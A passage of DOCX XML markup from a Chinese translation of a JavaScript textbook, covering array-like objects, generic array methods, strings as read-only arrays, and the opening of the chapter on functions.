        <w:t>return true;//o</w:t>
      </w:r>
      <w:r>
        <w:t>是类数组对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>否则它不是</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将在</w:t>
      </w:r>
      <w:r>
        <w:t>7.12</w:t>
      </w:r>
      <w:r>
        <w:t>节中看到在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中字符串的行为与数组类似（并且有些浏览器在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>之前已经让字符串变成可索引的了）。然而，类似上述的类数组对象的检测方法针对字符串常常返回</w:t>
      </w:r>
      <w:r>
        <w:t>false——</w:t>
      </w:r>
      <w:r>
        <w:t>它们通常最好当做字符串处理，而非数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组方法是特意定义为通用的，因此它们不仅应用在真正的数组而且在类数组对象</w:t>
      </w:r>
      <w:r>
        <w:t>上都能正确工作。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，所有的数组方法都是通用的。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中，除了</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>以外的所有方法也是通用的。（</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是一个特例：虽然可以用在类数组对象上，但它没有将那个对象扩充进返回的数组中。）既然类数组对象没有继承自</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>，那就不能在它们上面直接调用数组方法。尽管如此，可以间接地使用</w:t>
      </w:r>
      <w:r>
        <w:t>Function.call</w:t>
      </w:r>
      <w:r>
        <w:t>方法调用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>a={"0":"a","1":"b","2":"c",length:3};//</w:t>
      </w:r>
      <w:r>
        <w:t>类数组对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.prototype.join.call(a,"+")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"a+b+c"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.prototype.slice.call(a,0)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>["a","b","c"]</w:t>
      </w:r>
      <w:r>
        <w:t>：真正数组的副本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.prototype.map.call(a,function(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x.toUpperCase();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>})//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>["A","B","C"]:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>7.10</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>isArray()</w:t>
      </w:r>
      <w:r>
        <w:t>方法之前我们就已</w:t>
      </w:r>
      <w:r>
        <w:t>经见过</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>技术。</w:t>
      </w:r>
      <w:r>
        <w:t>8.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节涵盖关于</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的更多内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>数组方法是在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 1.5</w:t>
      </w:r>
      <w:r>
        <w:t>中引入的。由于它们的写法的一般性，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>还将这些方法的版本在</w:t>
      </w:r>
      <w:r>
        <w:t>Array</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数上直接定义为函数。使用这些方法定义的版本，上述例子就可以这样重写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a={"0":"a","1":"b","2":"c",length:3};//</w:t>
      </w:r>
      <w:r>
        <w:t>类数组对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.join(a,"+")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.slice(a,0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.map(a,funct</w:t>
      </w:r>
      <w:r>
        <w:t>ion(x){return x.toUpperCase();})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当用在类数组对象上时，数组方法的静态函数版本非常有用。但既然它们不是标准的，不能期望它们在所有的浏览器中都有定义。可以这样书写代码来保证使用它们之前是存在的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.join=Array.join||function(a,sep){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Array.prototype.join.call(a,sep);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.slice=Array.slice||function(a,from,to){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype.slice.call(a,from,to);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.map=Array.map||function(a,f,thisArg){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Array.prototype.map.call(a,f,thisArg);</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189" w:name="7_12_Zuo_Wei_Shu_Zu_De_Zi_Fu_Chuan_"/>
      <w:r>
        <w:t>7.12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为数组的字符串</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>（在众多最近的浏览器实现</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>包括</w:t>
      </w:r>
      <w:r>
        <w:t>IE8——</w:t>
      </w:r>
      <w:r>
        <w:t>早于</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>）中，字符串的行为类似于只读的数组。除了用</w:t>
      </w:r>
      <w:r>
        <w:t>charAt()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来访问单个的字符以外，还可以使用方括号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>s=test;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>s.charAt(0)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"t"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s[1]//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"e"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当然，针对字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>操作符仍然返回</w:t>
      </w:r>
      <w:r>
        <w:t>"string"</w:t>
      </w:r>
      <w:r>
        <w:t>，但是如果给</w:t>
      </w:r>
      <w:r>
        <w:t>Array.isArray()</w:t>
      </w:r>
      <w:r>
        <w:t>传递字符串，它将返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可索引的字符串的最大的好处就是简单，用方括号代替了</w:t>
      </w:r>
      <w:r>
        <w:t>charAt()</w:t>
      </w:r>
      <w:r>
        <w:t>调用，这样更加简洁、可读并且可能更高效。不仅如此，字符串的行为类似于数组的事实使得通用的数组方法可以应用到字符串上。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s="JavaScript"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.prototype.join.call(s,"")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"J</w:t>
      </w:r>
      <w:r>
        <w:t>avaScript"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Array.prototype.filter.call(s,//</w:t>
      </w:r>
      <w:r>
        <w:t>过滤字符串中的字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x.match(/[^aeiou]/);//</w:t>
      </w:r>
      <w:r>
        <w:t>只匹配非元音字母</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}).join("")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"JvScrpt"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请记住，字符串是不可变值，故当把它们作为数组看待时，它们是只读的。如</w:t>
      </w:r>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>sort()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>reverse()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>等数组方法会修改数组，它们在字符串上是无效的。不仅如此，使用数组方法来修改字符串会导致错误：出错的时候没有提示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="190" w:name="Di_8Zhang__Han_Shu_____Han_Shu_Shi_Zhe_Y"/>
      <w:bookmarkStart w:id="191" w:name="Di_8Zhang__Han_Shu_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="190"/>
      <w:bookmarkEnd w:id="191"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数是这样的一段</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码，它只定义一次，但可能被执行或调用任意次。你可能已经从诸如子例程（</w:t>
      </w:r>
      <w:r>
        <w:t>subroutine</w:t>
      </w:r>
      <w:r>
        <w:t>）或者过程（</w:t>
      </w:r>
      <w:r>
        <w:t>procedure</w:t>
      </w:r>
      <w:r>
        <w:t>）这些名字里对函数的概念有所了解。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数是参数化的：函数的定义会包括一个称为形参（</w:t>
      </w:r>
      <w:r>
        <w:t>parameter</w:t>
      </w:r>
      <w:r>
        <w:t>）的标识符列表，这些参数在函数体中像局部变量一样工作。函数调用会为形参提供实参的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>。函数使用它们实参的值来计算返回值，成为该函数调用表达式的值。除了实参之外，每次调用还会拥有另一个值</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>本次调用的上下文</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>这就是</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键</w:t>
      </w:r>
      <w:r>
        <w:t>字的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果函数挂载在一个对象上，作为对象的一个属性，就称它为对象的方法。当通过这个对象来调用函数时，该对象就是此次调用的上下文（</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>），也就是该函数的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>的值。用于初始化一个新创建的对象的函数称为构造函数（</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>6.1</w:t>
      </w:r>
      <w:r>
        <w:t>节会对构造函数有进一步的讲解，第</w:t>
      </w:r>
      <w:r>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>章还会再谈到它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>里，函数即对象，程序可以随意操控它们。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以把函数赋值给变量，或者作为参数传递给其他函数。因为函数就是对象，所以可以给它们设置属性，甚至调用它们的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ja</w:t>
      </w:r>
      <w:r>
        <w:t>vaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的函数可以嵌套在其他函数中定义，这样它们就可以访问它们被定义时所处的作用域中的任何变量。这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数构成了一个闭包（</w:t>
      </w:r>
      <w:r>
        <w:t>closure</w:t>
      </w:r>
      <w:r>
        <w:t>），它给</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>带来了非常强劲的编程能力。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="192" w:name="8_1_Han_Shu_Ding_Yi_"/>
      <w:r>
        <w:t>8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　函数定义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数使用</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>关键字来定义，它可以用在函数定义表达式（见</w:t>
      </w:r>
      <w:r>
        <w:t>4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）或者函数声明语句（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）里。在两种形式中，函数定义都从</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>关键字开始，其后跟随这些组成部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>函数名称标识符。函数名称是函数声明语句必需的部分。它的用途就像变量的名字，新定</w:t>
      </w:r>
      <w:r>
        <w:t>义的函数对象会赋值给这个变量。对函数定义表达式来说，这个名字是可选的：如果存在，该名字只存在于函数体中，并指代该函数对象本身。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一对圆括号，其中包含由</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个或者多个用逗号隔开的标识符组成的列表。这些标识符是函数的参数名称，它们就像函数体中的局部变量一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一对花括号，其中包含</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>条或多条</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句。这些语句构成了函数体：一旦调用函数，就会执行这些语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-1</w:t>
      </w:r>
      <w:r>
        <w:t>分别展示了函数语句和表达式两种方式的函数定义。注意，以表达式来定义函数只适用于它作为一个大的表达式的一部分，比如在赋值和调用过程中定义函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-1</w:t>
      </w:r>
      <w:r>
        <w:t>：定义</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的每个属性的名称和值，返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function printprops(o){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var p in o)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(p+":"+o[p]+"\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>计算两个笛卡尔坐标（</w:t>
      </w:r>
      <w:r>
        <w:t>x1,y1</w:t>
      </w:r>
      <w:r>
        <w:t>）和</w:t>
      </w:r>
      <w:r>
        <w:t>(x2,y2)</w:t>
      </w:r>
      <w:r>
        <w:t>之间的距离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function distance(x1,y1,x2,y</w:t>
      </w:r>
      <w:r>
        <w:t>2){</w:t>
      </w:r>
    </w:p>
